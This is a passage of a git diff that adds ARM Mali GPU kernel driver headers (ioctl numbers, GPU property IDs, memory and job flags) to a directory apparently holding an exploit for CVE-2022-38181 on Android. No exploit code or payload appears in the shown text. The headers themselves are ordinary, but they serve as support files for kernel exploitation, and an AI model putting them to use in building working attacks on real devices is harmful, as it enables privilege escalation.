+ __u32 bytes_collected;
+ __u32 bytes_generated;
+};
+
+#define KBASE_IOCTL_TLSTREAM_STATS \
+ _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
+
+#endif /* MALI_UNIT_TEST */
+
+/* Customer extension range */
+#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
+
+/* If the integration needs extra ioctl add them there
+ * like this:
+ *
+ * struct my_ioctl_args {
+ * ....
+ * }
+ *
+ * #define KBASE_IOCTL_MY_IOCTL \
+ * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
+ */
+
+
+/**********************************
+ * Definitions for GPU properties *
+ **********************************/
+#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
+#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
+#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
+#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
+
+#define KBASE_GPUPROP_PRODUCT_ID 1
+#define KBASE_GPUPROP_VERSION_STATUS 2
+#define KBASE_GPUPROP_MINOR_REVISION 3
+#define KBASE_GPUPROP_MAJOR_REVISION 4
+/* 5 previously used for GPU speed */
+#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
+/* 7 previously used for minimum GPU speed */
+#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
+#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
+#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
+#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
+#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
+
+#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
+#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
+#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
+
+#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
+#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
+
+#define KBASE_GPUPROP_MAX_THREADS 18
+#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
+#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
+#define KBASE_GPUPROP_MAX_REGISTERS 21
+#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
+#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
+#define KBASE_GPUPROP_IMPL_TECH 24
+
+#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
+#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
+#define KBASE_GPUPROP_RAW_L2_PRESENT 27
+#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
+#define KBASE_GPUPROP_RAW_L2_FEATURES 29
+#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
+#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
+#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
+#define KBASE_GPUPROP_RAW_AS_PRESENT 33
+#define KBASE_GPUPROP_RAW_JS_PRESENT 34
+#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
+#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
+#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
+#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
+#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
+#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
+#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
+#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
+#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
+#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
+#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
+#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
+#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
+#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
+#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
+#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
+#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
+#define KBASE_GPUPROP_RAW_GPU_ID 55
+#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
+#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
+#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
+#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
+#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
+
+#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
+#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
+#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
+#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
+#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
+#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
+#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
+#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
+#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
+#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
+#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
+#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
+#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
+#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
+#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
+#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
+#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
+#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
+#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
+
+#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
+
+#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
+
+#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
+#define KBASE_GPUPROP_TLS_ALLOC 84
+#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
+
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+
+#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h
new file mode 100644
index 0000000..b1cf438
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_38181/mali_base_jm_kernel.h
@@ -0,0 +1,1216 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_JM_KERNEL_H_
+#define _UAPI_BASE_JM_KERNEL_H_
+
+#include <linux/types.h>
+
+typedef __u32 base_mem_alloc_flags;
+/* Memory allocation, access/hint flags.
+ *
+ * See base_mem_alloc_flags.
+ */
+
+/* IN */
+/* Read access CPU side
+ */
+#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
+
+/* Write access CPU side
+ */
+#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
+
+/* Read access GPU side
+ */
+#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
+
+/* Write access GPU side
+ */
+#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
+
+/* Execute allowed on the GPU side
+ */
+#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
+
+/* Will be permanently mapped in kernel space.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
+
+/* The allocation will completely reside within the same 4GB chunk in the GPU
+ * virtual space.
+ * Since this flag is primarily required only for the TLS memory which will
+ * not be used to contain executable code and also not used for Tiler heap,
+ * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
+ */
+#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
+
+/* Userspace is not allowed to free this memory.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
+
+#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
+
+/* Grow backing store on GPU Page Fault
+ */
+#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
+
+/* Page coherence Outer shareable, if available
+ */
+#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
+
+/* Page coherence Inner shareable
+ */
+#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
+
+/* IN/OUT */
+/* Should be cached on the CPU, returned if actually cached
+ */
+#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
+
+/* IN/OUT */
+/* Must have same VA on both the GPU and the CPU
+ */
+#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
+
+/* OUT */
+/* Must call mmap to acquire a GPU address for the allocation
+ */
+#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
+
+/* IN */
+/* Page coherence Outer shareable, required.
+ */
+#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
+
+/* Protected memory
+ */
+#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
+
+/* Not needed physical memory
+ */
+#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
+
+/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
+ * addresses to be the same
+ */
+#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
+
+/**
+ * Bit 19 is reserved.
+ *
+ * Do not remove, use the next unreserved bit for new flags
+ */
+#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
+
+/**
+ * Memory starting from the end of the initial commit is aligned to 'extension'
+ * pages, where 'extension' must be a power of 2 and no more than
+ * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
+
+/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
+ * mode. Some components within the GPU might only be able to access memory
+ * that is GPU cacheable. Refer to the specific GPU implementation for more
+ * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail
+ * if the memory is not aligned to GPU and CPU cache line width.
+ */
+#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
+
+/*
+ * Bits [22:25] for group_id (0~15).
+ *
+ * base_mem_group_id_set() should be used to pack a memory group ID into a
+ * base_mem_alloc_flags value instead of accessing the bits directly.
+ * base_mem_group_id_get() should be used to extract the memory group ID from
+ * a base_mem_alloc_flags value.
+ */
+#define BASEP_MEM_GROUP_ID_SHIFT 22
+#define BASE_MEM_GROUP_ID_MASK \
+ ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
+
+/* Must do CPU cache maintenance when imported memory is mapped/unmapped
+ * on GPU. Currently applicable to dma-buf type only.
+ */
+#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
+
+/* Use the GPU VA chosen by the kernel client */
+#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
+
+/* OUT */
+/* Kernel side cache sync ops required */
+#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
+
+/* Force trimming of JIT allocations when creating a new allocation */
+#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
+
+/* Number of bits used as flags for base memory management
+ *
+ * Must be kept in sync with the base_mem_alloc_flags flags
+ */
+#define BASE_MEM_FLAGS_NR_BITS 30
+
+/* A mask of all the flags which are only valid for allocations within kbase,
+ * and may not be passed from user space.
+ */
+#define BASEP_MEM_FLAGS_KERNEL_ONLY \
+ (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \
+ BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM)
+
+/* A mask for all output bits, excluding IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
+
+/* A mask for all input bits, including IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_INPUT_MASK \
+ (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
+
+/* A mask of all currently reserved flags
+ */
+#define BASE_MEM_FLAGS_RESERVED \
+ (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19)
+
+#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
+#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
+#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
+/* reserved handles ..-47<<PAGE_SHIFT> for future special handles */
+#define BASE_MEM_COOKIE_BASE (64ul << 12)
+#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
+ BASE_MEM_COOKIE_BASE)
+
+/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
+ * initial commit is aligned to 'extension' pages, where 'extension' must be a power
+ * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
+
+/**
+ * If set, the heap info address points to a __u32 holding the used size in bytes;
+ * otherwise it points to a __u64 holding the lowest address of unused memory.
+ */
+#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
+
+/**
+ * Valid set of just-in-time memory allocation flags
+ *
+ * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
+ * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
+ * and heap_info_gpu_addr being 0 will be rejected).
+ */
+#define BASE_JIT_ALLOC_VALID_FLAGS \
+ (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
+
+/**
+ * typedef base_context_create_flags - Flags to pass to ::base_context_init.
+ *
+ * Flags can be ORed together to enable multiple things.
+ *
+ * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
+ * not collide with them.
+ */
+typedef __u32 base_context_create_flags;
+
+/* No flags set */
+#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
+
+/* Base context is embedded in a cctx object (flag used for CINSTR
+ * software counter macros)
+ */
+#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
+
+/* Base context is a 'System Monitor' context for Hardware counters.
+ *
+ * One important side effect of this is that job submission is disabled.
+ */
+#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
+ ((base_context_create_flags)1 << 1)
+
+/* Bit-shift used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
+
+/* Bitmask used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
+ ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
+
+/* Bitpattern describing the base_context_create_flags that can be
+ * passed to the kernel
+ */
+#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
+ (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \
+ BASEP_CONTEXT_MMU_GROUP_ID_MASK)
+
+/* Bitpattern describing the ::base_context_create_flags that can be
+ * passed to base_context_init()
+ */
+#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
+ (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
+
+/*
+ * Private flags used on the base context
+ *
+ * These start at bit 31, and run down to zero.
+ *
+ * They share the same space as base_context_create_flags, and so must
+ * not collide with them.
+ */
+
+/* Private flag tracking whether job descriptor dumping is disabled */
+#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
+ ((base_context_create_flags)(1 << 31))
+
+/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
+ * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
+ */
+#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
+
+/* Indicate that job dumping is enabled. This could affect certain timers
+ * to account for the performance impact.
+ */
+#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
+
+#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
+ BASE_TLSTREAM_JOB_DUMPING_ENABLED)
+/*
+ * Dependency stuff, keep it private for now. May want to expose it if
+ * we decide to make the number of semaphores a configurable
+ * option.
+ */
+#define BASE_JD_ATOM_COUNT 256
+
+/* Maximum number of concurrent render passes.
+ */
+#define BASE_JD_RP_COUNT (256)
+
+/* Set/reset values for a software event */
+#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
+#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
+
+/**
+ * struct base_jd_udata - Per-job data
+ *
+ * This structure is used to store per-job data, and is completely unused
+ * by the Base driver. It can be used to store things such as callback
+ * function pointer, data to handle job completion. It is guaranteed to be
+ * untouched by the Base driver.
+ *
+ * @blob: per-job data array
+ */
+struct base_jd_udata {
+ __u64 blob[2];
+};
+
+/**
+ * typedef base_jd_dep_type - Job dependency type.
+ *
+ * A flags field will be inserted into the atom structure to specify whether a
+ * dependency is a data or ordering dependency (by putting it before/after
+ * 'core_req' in the structure it should be possible to add without changing
+ * the structure size).
+ * When the flag is set for a particular dependency to signal that it is an
+ * ordering only dependency then errors will not be propagated.
+ */
+typedef __u8 base_jd_dep_type;
+
+#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */
+#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */
+#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */
+
+/**
+ * typedef base_jd_core_req - Job chain hardware requirements.
+ *
+ * A job chain must specify what GPU features it needs to allow the
+ * driver to schedule the job correctly. By not specifying the
+ * correct settings can/will cause an early job termination. Multiple
+ * values can be ORed together to specify multiple requirements.
+ * Special case is ::BASE_JD_REQ_DEP, which is used to express complex
+ * dependencies, and that doesn't execute anything on the hardware.
+ */
+typedef __u32 base_jd_core_req;
+
+/* Requirements that come from the HW */
+
+/* No requirement, dependency only
+ */
+#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
+
+/* Requires fragment shaders
+ */
+#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
+
+/* Requires compute shaders
+ *
+ * This covers any of the following GPU job types:
+ * - Vertex Shader Job
+ * - Geometry Shader Job
+ * - An actual Compute Shader Job
+ *
+ * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
+ * job is specifically just the "Compute Shader" job type, and not the "Vertex
+ * Shader" nor the "Geometry Shader" job type.
+ */
+#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
+
+/* Requires tiling */
+#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
+
+/* Requires cache flushes */
+#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
+
+/* Requires value writeback */
+#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
+
+/* SW-only requirements - the HW does not expose these as part of the job slot
+ * capabilities
+ */
+
+/* Requires fragment job with AFBC encoding */
+#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
+
+/* SW-only requirement: coalesce completion events.
+ * If this bit is set then completion of this atom will not cause an event to
+ * be sent to userspace, whether successful or not; completion events will be
+ * deferred until an atom completes which does not have this bit set.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
+ */
+#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
+
+/* SW Only requirement: the job chain requires a coherent core group. We don't
+ * mind which coherent core group is used.
+ */
+#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
+
+/* SW Only requirement: The performance counters should be enabled only when
+ * they are needed, to reduce power consumption.
+ */
+#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
+
+/* SW Only requirement: External resources are referenced by this atom.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
+ * BASE_JD_REQ_SOFT_EVENT_WAIT.
+ */
+#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
+
+/* SW Only requirement: Software defined job. Jobs with this bit set will not be
+ * submitted to the hardware but will cause some action to happen within the
+ * driver
+ */
+#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
+
+#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1)
+#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2)
+#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3)
+
+/* 0x4 RESERVED for now */
+
+/* SW only requirement: event wait/trigger job.
+ *
+ * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
+ * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
+ * other waiting jobs. It completes immediately.
+ * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
+ * possible for other jobs to wait upon. It completes immediately.
+ */
+#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
+#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
+#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7)
+
+#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8)
+
+/* SW only requirement: Just In Time allocation
+ *
+ * This job requests a single or multiple just-in-time allocations through a
+ * list of base_jit_alloc_info structure which is passed via the jc element of
+ * the atom. The number of base_jit_alloc_info structures present in the
+ * list is passed via the nr_extres element of the atom
+ *
+ * It should be noted that the id entry in base_jit_alloc_info must not
+ * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
+ *
+ * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
+ * soft job to free the JIT allocation is still made.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9)
+
+/* SW only requirement: Just In Time free
+ *
+ * This job requests a single or multiple just-in-time allocations created by
+ * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
+ * allocations is passed via the jc element of the atom.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa)
+
+/* SW only requirement: Map external resource
+ *
+ * This job requests external resource(s) are mapped once the dependencies
+ * of the job have been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb)
+
+/* SW only requirement: Unmap external resource
+ *
+ * This job requests external resource(s) are unmapped once the dependencies
+ * of the job has been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc)
+
+/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
+ *
+ * This indicates that the Job Chain contains GPU jobs of the 'Compute
+ * Shaders' type.
+ *
+ * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
+ * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
+ */
+#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
+
+/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
+ * particular core group
+ *
+ * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
+ * takes priority
+ *
+ * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
+ *
+ * If the core availability policy is keeping the required core group turned
+ * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
+ */
+#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
+
+/* SW Flag: If this bit is set then the successful completion of this atom
+ * will not cause an event to be sent to userspace
+ */
+#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
+
+/* SW Flag: If this bit is set then completion of this atom will not cause an
+ * event to be sent to userspace, whether successful or not.
+ */
+#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
+
+/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job starts which does not have this bit set or a job completes
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
+ * if the CPU may have written to memory addressed by the job since the last job
+ * without this bit set was submitted.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
+
+/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job completes which does not have this bit set or a job starts
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
+ * if the CPU may read from or partially overwrite memory addressed by the job
+ * before the next job without this bit set completes.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
+
+/* Request the atom be executed on a specific job slot.
+ *
+ * When this flag is specified, it takes precedence over any existing job slot
+ * selection logic.
+ */
+#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
+
+/* SW-only requirement: The atom is the start of a renderpass.
+ *
+ * If this bit is set then the job chain will be soft-stopped if it causes the
+ * GPU to write beyond the end of the physical pages backing the tiler heap, and
+ * committing more memory to the heap would exceed an internal threshold. It may
+ * be resumed after running one of the job chains attached to an atom with
+ * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
+ * resumed multiple times until it completes without memory usage exceeding the
+ * threshold.
+ *
+ * Usually used with BASE_JD_REQ_T.
+ */
+#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
+
+/* SW-only requirement: The atom is the end of a renderpass.
+ *
+ * If this bit is set then the atom incorporates the CPU address of a
+ * base_jd_fragment object instead of the GPU address of a job chain.
+ *
+ * Which job chain is run depends upon whether the atom with the same renderpass
+ * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
+ * was soft-stopped when it exceeded an upper threshold for tiler heap memory
+ * usage.
+ *
+ * It also depends upon whether one of the job chains attached to the atom has
+ * already been run as part of the same renderpass (in which case it would have
+ * written unresolved multisampled and otherwise-discarded output to temporary
+ * buffers that need to be read back). The job chain for doing a forced read and
+ * forced write (from/to temporary buffers) is run as many times as necessary.
+ *
+ * Usually used with BASE_JD_REQ_FS.
+ */
+#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
+
+/* SW-only requirement: The atom needs to run on a limited core mask affinity.
+ *
+ * If this bit is set then the kbase_context.limited_core_mask will be applied
+ * to the affinity.
+ */
+#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
+
+/* These requirement bits are currently unused in base_jd_core_req
+ */
+#define BASEP_JD_REQ_RESERVED \
+ (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \
+ BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \
+ BASE_JD_REQ_EVENT_COALESCE | \
+ BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \
+ BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \
